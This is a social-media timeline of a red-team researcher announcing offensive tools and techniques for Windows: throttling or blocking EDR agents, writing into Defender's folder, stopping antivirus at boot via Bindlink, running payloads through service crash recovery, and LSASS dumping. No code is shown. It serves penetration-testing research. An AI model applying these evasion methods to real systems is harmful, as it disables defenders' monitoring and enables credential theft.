Chief Security Officer (CSO) || Security Researcher at ZeroSalarium.com || Penetration Tester || Red Teamer || Social Engineering Awareness Trainer
Joined September 2024
- Tweets 275
- Following 2,016
- Followers 5,045
- Likes 978
47 Photos and videos
Pinned Tweet
New #redteam tool for blocking EDRs: EDRChoker
Instead of fully blocking the EDR agents' connections to their server, we can throttle their bandwidth so they consistently time out when sending data, which is effectively the same as blocking but avoids triggering "block" or "drop" packet events
#pentest #cybersecurity
Github: TwoSevenOneT/EDRChoker
ALT EDRChoker run throttling EDR process list
ALT Elastic EDR blocked by EDRChoker
ALT EDRChoker run remove throttling EDR process
24
178
751
109,172
New #redteam tool for blocking EDRs: EDRChoker
Instead of fully blocking the EDR agents' connections to their server, we can throttle their bandwidth so they consistently time out when sending data, which is effectively the same as blocking but avoids triggering "block" or "drop" packet events
#pentest #cybersecurity
Github: TwoSevenOneT/EDRChoker
ALT EDRChoker run throttling EDR process list
ALT Elastic EDR blocked by EDRChoker
ALT EDRChoker run remove throttling EDR process
24
178
751
109,172
EDRChoker uses Policy-based Quality of Service (QoS) to set hard bandwidth caps (throttling) on Endpoint Detection and Response (EDR) agents, causing them to always time out - effectively blocking them.
#itsecurity #securityblog #altimalware
zerosalarium.com/2026/06/edr…
1
25
108
13,282
Some powerful built-in Windows 11 programs are allowed to write files to Defender’s working directory:
\System32\msiexec.exe
\Register-CimProvider.exe
\svchost.exe
\lsass.exe
Tools and methods to find these whitelisted programs for other #antimalware
Github: /TwoSevenOneT/DefenderWrite
30
145
11,384
Challenge: Drop #mimikatz onto a drive with the latest Windows 11.
1. Found a way to write a file into Windows Defender’s working directory: Success ✅
2. Dropped "mimikatz.exe" into that folder: Failed 🛑
Conclusion: Windows Defender does not exclude its own executable folder
11
52
9,160
Apr 19
While I was trying to evade cloud-based EDRs, I accidentally found a way to temporarily block a client's machine network with a POC running as a Normal user.
Not using the Windows Filtering Platform (WFP) which requires Admin priv
I haven't thought of exploitation scenarios for this tool yet, it might be a dead-end #antimalware research direction 🤔
#redteam
ALT block a client's machine network with a POC running as a Normal user
3
31
162
16,935
Apr 19
Need to survey which Antivirus product to prioritize bypassing
Apr 18
Had a Threat Actor ask for an anti-virus recommendation
DAWG, YOU ARE THE THREAT. WHY DO YOU NEED AN AV?
1
16
6,177
Apr 19
To be honest, in many cases I test evasion or antivirus bypass by dropping #mimikatz onto the Desktop and running it to see if it works.
I don't use the EICAR test file 😂
Drop Mimikatz and the AV doesn't complain ==> something's worked
Apr 17
5
5
81
16,101
Mar 12
They work harder than the sysadmin team to confige users' machines 🤣
1
3
18
7,217
I am releasing a new toolkit I built for IIS-based lateral movement and code execution within IIS worker pool process's memory.
Phantom ASPX Loader & PhantomLink -- a two-part toolkit for reflectively loading native DLLs into IIS w3wp.exe worker processes via ASPX.
github.com/zux0x3a/Phantom/t…
4
78
248
16,808
Two Seven One Three retweeted
Mar 3
Recently my RE workflow moved into sandboxed VMs where agents have full control over the environment. I needed an MCP server that runs headless in the same sandbox and exposes way more of the #BinaryNinja API than others.
Here's the release: github.com/mrphrazer/binary-…
3
50
271
37,071
Two Seven One Three retweeted
Feb 8
GitHub - 0xsh3llf1r3/ColdWer: Cobalt Strike BOF to freeze EDR/AV processes and dump LSASS using WerFaultSecure.exe PPL bypass github.com/0xsh3llf1r3/ColdW…
34
127
9,654
You can exploit the Service Failure Recovery feature of Windows Service to execute a payload without ever touching the ImagePath.
#antimalware #redteam #Pentesting
ALT RecoverIt abuse UevAgentService config
ALT CMD triggered by Services.exe when crash
ALT UevAgentService crash event
4
33
206
14,390
The biggest issue when exploiting Service Failure Recovery to execute a payload is figuring out how to trigger a "crash"
#securityblog #itsecurity #CyberSecurity
zerosalarium.com/2026/02/Def…
10
27
4,539
Jan 21
Throughout my soulless pentesting career, I have always preferred the Nday or "features" of the system over what is marketed as 0day
Jan 20
Oracle E-Business Suite Authentication Bypass & RCE (CVE-2025-61882)
vred.mbbank.com.vn/p/oracle-…
2
7
5,011
Jan 18
Every time I read a detection rule, I instinctively have devilish thoughts racing through my mind to bypass them😂
Jan 12
Detecting EDRStartupHinder in Microsoft Defender for Endpoint
🛑 EDRStartupHinder, developed by X@TwoSevenOneT, is a proof‑of‑concept tool that abuses Windows Bindlink to prevent Antivirus/EDR services from starting at boot. It achieves this by redirecting critical System32 DLLs, ultimately forcing protected processes to terminate themselves.
zerosalarium.com/2026/01/edr…
To support fellow defenders, I’ve crafted a Defender XDR Advanced Hunting KQL query that can be deployed in your environment to help monitor and detect potential use of EDRStartupHinder. 🫡
🔍 Stay vigilant, share knowledge, and strengthen our collective defenses.
#CyberSecurity #ThreatDetection #MDE #EDRStartupHinder
1
2
41
7,268
Jan 11
You can prevent #antimalware / EDR services from running at startup by using Bindlink
Github: TwoSevenOneT/EDRStartupHinder
#securityvulnerability #itsecurity
ALT EDRStartupHinder run success with Windows Defender
ALT EDRStartupHinder success block MsMpEng
ALT EDRStartupHinder make Windows Defender terminated
2
48
196
13,391
Jan 11
EDRStartupHinder prevents #antimalware and EDR from running by redirecting a core DLL in the System32 folder to another location during Windows startup.
#cybersecurity #PenTest
zerosalarium.com/2026/01/edr…
2
18
74
6,437
Two Seven One Three retweeted
18 Nov 2025
Using the Don't Look Up Tool to Eavesdrop on Insecure Private Satellite Communications rtl-sdr.com/using-the-dont-l…
4
122
701
42,870